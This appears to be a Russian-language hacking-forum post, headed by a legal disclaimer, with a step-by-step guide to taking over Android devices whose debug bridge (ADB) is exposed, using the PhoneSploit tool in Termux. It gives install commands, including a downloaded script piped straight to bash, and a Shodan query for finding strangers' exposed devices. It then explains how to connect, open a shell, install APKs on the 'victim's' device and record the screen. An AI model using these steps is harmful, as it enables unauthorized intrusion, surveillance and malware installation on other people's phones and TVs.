• Читаемое за неделю
  • Последние ответы
  • Новые темы

Взлом Android смартфона через уязвимость ADB [PhoneSploit]

Дисклеймер
Данная статья написана в ознакомительных целях. Автор ни в коем случае не призывает читателей к нарушению законодательства РФ. Пожалуйста, не повторяйте действия, описанные в данной статье, предварительно не ознакомившись с главой 272 УК РФ. Все действия в данной статье осуществлялись на устройствах личного пользования.

Привет, хардовцы!

Хочу рассказать о такой уязвимости как android debug bridge(ADB), которая позволяет взломать смартфон на Android OS зная только IP-адрес.
Что такое ADB и на каком порту прослушивается можно найти в google.

Все действия будут осуществляться в нашем любимом termux:
1.Установка
Обновляем пакеты termux, и устанавливаем git:
Код:
pkg update
pkg upgrade
pkg install git

Устанавливаем ADB , при помощи следующего скрипта :
Код:
apt update > /dev/null 2>&1 && apt --assume-yes install wget > /dev/null 2>&1 && wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh -q && bash InstallTools.sh
Возвращаемся в домашнюю директорию, командой:
Код:
 cd

Устанавливаем сам Phonesploit :
Код:
git clone https://github.com/cyberknight777/PhoneSploit
cd PhoneSploit
bash termux.sh

2.Использование.
Далее нам необходим сам IP адрес уязвимого устройства, где же его взять? В этом деле нам поможет , можно использовать аналоги, но остановимся на нём.
shodan-logo.png

В поиске вбиваем запрос следующего характера :
android debug bridge product:”Android Debug Bridge”
Получаем IP устройств с уязвимостью (к слову, в списке будут не только смартфоны, но и TV работающие на Android OS и т.д.)

Перейдем к самому скрипту, для его запуска введем следующие команды :
Код:
cd $HOME
cd PhoneSploit
python2 main_linux.py

Screenshot.png

Мы видим следующее меню, дальнейшим действием будет подключение к уязвимому устройству, для этого мы выбираем пункт:
[3]Connect a new phone
После удачного подключения, мы можем использовать любой пункт данного меню, соответственно в пределе разумного.

Немного расшифровки по некоторым пунктам:
[4]. Access Shell on a phone - этот пункт позволяет открыть нам терминал shell и управлять устройством.
[5]. Install an apk on a phone - этот пункт позволяет установить нам apk файл на устройство жертвы. (давайте поработайте фантазией)
[6,7]. Screenshot/record a phone - позволяет сделать снимок экрана, или записать короткое видео экрана.
 

Сверху